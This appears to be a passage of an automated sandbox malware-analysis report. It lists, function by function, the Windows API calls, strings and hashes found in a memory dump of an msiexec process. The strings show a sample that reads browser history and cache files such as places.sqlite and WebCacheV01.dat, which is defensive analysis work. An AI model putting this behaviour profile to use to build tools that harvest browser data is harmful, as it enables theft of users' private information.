                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 669240632-0
                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                          APIs
                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                          • String ID: "%s"
                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2911713577-0
                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                          APIs
                                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp
                                                                                                          • String ID: @ $SQLite format 3
                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpqsort
                                                                                                          • String ID: /nosort$/sort
                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          Strings
                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                          APIs
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$memcmp
                                                                                                          • String ID: $$8
                                                                                                          • API String ID: 2808797137-435121686
                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1979745280-0
                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                          APIs
                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                          Strings
                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                          • API String ID: 4182280571-2036018995
                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                          APIs
                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                          • API String ID: 2641622041-467022611
                                                                                                          • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                          • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                          APIs
                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 839530781-0
                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindFirst
                                                                                                          • String ID: *.*$index.dat
                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1156039329-0
                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 3397143404-0
                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                          APIs
                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 1125800050-0
                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                          • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleSleep
                                                                                                          • String ID: }A
                                                                                                          • API String ID: 252777609-2138825249
                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: d
                                                                                                          • API String ID: 0-2564639436
                                                                                                          • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                          • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: BINARY
                                                                                                          • API String ID: 2221118986-907554435
                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp
                                                                                                          • String ID: /stext
                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
